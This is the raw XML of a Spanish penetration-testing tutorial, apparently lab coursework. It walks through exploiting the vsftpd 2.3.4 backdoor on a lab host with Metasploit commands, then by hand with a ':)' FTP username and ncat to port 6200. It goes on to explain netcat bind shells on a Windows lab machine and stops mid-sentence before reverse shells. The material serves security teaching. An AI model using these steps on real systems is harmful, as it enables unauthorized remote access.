    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000057">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 primero que haremos será buscar el módulo que nos interesa. Buscaremos primero por el nombre del servicio, ftp. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000058">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search ftp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000059">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Pr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5399730" cy="2540000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="13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39973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Pr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5399730" cy="3035300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="15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módulo que nos interesa tiene asociado el identificador 141. este número es variable, es decir, dependiendo de los resultados de la búsqueda, se nos mostrará un número u otro. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005C">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Así, si hacemos una búsqueda más restrictiva, veremos que el ID variará. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005D">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="120" w:before="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="19" w:firstLine="548"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:fill="b7b7b7" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">search vsftpd</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="120" w:before="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="19"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1079500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="15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39973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120" w:before="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="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0">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cualquier caso, podemos utilizar el número identificador de la última búsqueda para decir que queremos hacer uso del exploit en cuestión. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000061">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use 0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000062">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Pr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4495800" cy="590550"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="15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4958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after="120" w:before="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="19"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Ahora, utilizaremos el comando </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">options </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">para ver qué opciones podemos (o debemos) configurar: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000064">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i w:val="1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:fill="b7b7b7" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">options </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000065">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="120" w:before="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="19"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2019300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="13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3997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Como vemos, las opciones RHOSTS y RPORT son obligatorias. RPORT ya tiene asignado el valor 21, y no nos interesa cambiarlo. Sin embargo, RHOSTS está vacía, y le vamos a asignar como valor la IP de la máquina </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">víctima (10.10.10.250)</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67">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este caso, no existe más que un payload. Si hubiera más, podríamos seleccionar el deseado. De todas maneras, si no se indica ningún otro, ell payload elegido será el que viene entre paréntesis: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cmd/unix/interact</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68">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Fijaremos la IP de la víctima como se nos exige: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000069">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="120" w:before="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="19" w:firstLine="0"/>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set rhosts 10.10.10.250</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006A">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="120" w:before="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="19" w:firstLine="0"/>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Pr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5324475" cy="342900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="13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3244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continuación, mediante el los comandos </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">exploit </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">o </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">run </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ponemos en marcha el exploit. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006C">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="120" w:before="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="19"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1282700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="15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39973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Como vemos, los comandos que ejecutemos nos mostrarán información de la víctima, señal de que nos hemos conectado a ella. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>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80" w:before="280" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1224" w:right="0" w:hanging="504.00000000000006"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.hlntmkrrjysj" w:id="8"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Sin usar Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006F">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Pero, ¿cómo funciona el exploit? ¿Cómo podríamos llevarlo a cabo sin tener una herramienta como </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Metasploit</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">? Lo primero, aprendamos un poco acerca de la vulnerabilidad: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000070">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="120" w:before="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="19" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId26">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">http://www.securitybydefault.com/2011/07/el-smile-de-la-muerte-puerta-trasera-en.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000071">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="120" w:before="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="19" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId27">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.welivesecurity.com/la-es/2011/07/05/backdoor-software-libre-vsftpd/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000072">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="120" w:before="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="19" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId28">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://0x00sec.org/t/through-the-looking-glass-lame/19149</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Empezaremos conectándonos al servidor FTP de la víctima: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000074">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="120" w:before="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="19" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:fill="b7b7b7" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ftp 10.10.10.250</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000075">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="120" w:before="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="19"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895600" cy="1295400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="16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895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Como nombre de usuario tenemos que introducir cualquier string acabado con los caracteres </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. La contraseña puede ser cuaquiera. Veremos que aparentemente no pasa nada, no recibimos ningún mensaje de ningún tipo. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000077">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Sin embargo, en la víctima se habrá abierto una shell que podemos aprovechar simplemente con </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ncat</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78">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487228" cy="451097"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="15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487228" cy="45109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Hemos conseguido conectarnos de manera remota a la víctima por medio de la puerta trasera abierta en el puerto 6200.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B">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>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360" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="360" w:right="0" w:hanging="360"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.bywl3yr6moay" w:id="9"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Creación de shells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Una shell remota es una interfaz que permite a un usuario ejecutar comandos en un sistema a través de una conexión de red, posibilitando que el usuario ejecute comandos y controle el sistema desde una ubicación remota. Esto, además de  para la administración de sistemas, puede ser utilizado para acceder a un sistema de forma no autorizada. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007D">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Una bind shell o shell directa se conoce así porque su objetivo es "ligar" o "enlazar" una conexión entrante a un determinado puerto en la máquina objetivo con una terminal en dicha máquina. La idea es que cuando alguien se conecta a ese puerto específico de la máquina objetivo tendrá acceso a una shell remota en esa máquina, permitiendo al atacante ejecutar comandos en ella.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007E">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Netcat es una herramienta muy apropiada para abrir shells, ya que puede enviar los mensajes de entrada, salida y de error a determinados puertos en lugar de mostrarlos en la consola. De esta manera, se consigue que una aplicación quede asociada a un puerto local; así, quien se conecte a ese puerto estará ejecutando la aplicación. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007F">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Vamos a verlo con un ejemplo; supongamos que tenemos una equipo Windows 11(10.10.10.121) y otra Kali en su misma red.  Vamos a establecer una bind shell para tomar el control de la primera desde la segunda, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">utilizando como programas a ejecutar primero cmd y después powershell.</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80">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 primero, abrimos un listener en la máquina Windows. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000081">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="120" w:before="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="19" w:firstLine="548"/>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663663" cy="295275"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="153" name="image16.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image16.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId31"/>
                    <a:srcRect b="55514" l="0" r="19409" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2663663"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after="120" w:before="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="19" w:firstLine="548"/>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Ahora, en Kali efectuamos la conexión; y ya podemos trabajar remotamente en el CMD de la víctima. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000083">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="120" w:before="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="19" w:firstLine="548"/>
        <w:jc w:val="center"/>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133350</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4120515" cy="1625803"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:wrapSquare wrapText="bothSides" distB="114300" distT="114300" distL="114300" distR="114300"/>
            <wp:docPr id="146" name="image6.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image6.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId32"/>
                    <a:srcRect b="44138" l="0" r="23703" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4120515" cy="1625803"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000084">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="120" w:before="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="19" w:firstLine="548"/>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widowControl w:val="0"/>
        <w:spacing w:after="120" w:before="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="19" w:firstLine="548"/>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widowControl w:val="0"/>
        <w:spacing w:after="120" w:before="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="19" w:firstLine="548"/>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7">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="120" w:before="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="19" w:firstLine="548"/>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8">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="120" w:before="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="19" w:firstLine="548"/>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widowControl w:val="0"/>
        <w:spacing w:after="120" w:before="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="19" w:firstLine="548"/>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A">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="120" w:before="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="19" w:firstLine="548"/>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widowControl w:val="0"/>
        <w:spacing w:after="120" w:before="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="19" w:firstLine="548"/>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Repetimos el proceso pero para tomar el control para trabajar en el Powershell de la víctima. </w:t>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478761</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3305175" cy="390390"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:wrapSquare wrapText="bothSides" distB="114300" distT="114300" distL="114300" distR="114300"/>
            <wp:docPr id="154" name="image16.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image16.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId31"/>
                    <a:srcRect b="0" l="0" r="0" t="41448"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3305175" cy="390390"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008C">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="120" w:before="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="19" w:firstLine="548"/>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9" w:right="0" w:firstLine="548"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Como</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> vemos, sin necesidad de acceder mediante un servicio abierto en la víctima, hemos sido capaces de establecer una shell que nos ha permitido conectarnos a ella en un puerto a nuestra elección para posteriormente ejecutar comandos. Sin embargo, es muy probable que realizar un bind shell no sea tan sencillo debido a que pueden existir diversos mecanismos de defensa que hagan que el tráfico al puerto en el que queremos establecer la shell esté cerrado. En cambio, es menos probable que el tráfico generado en la propia víctima esté prohibido;  es por ello por lo que en muchas ocasiones el atacante deberá establecer, en lugar de una </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
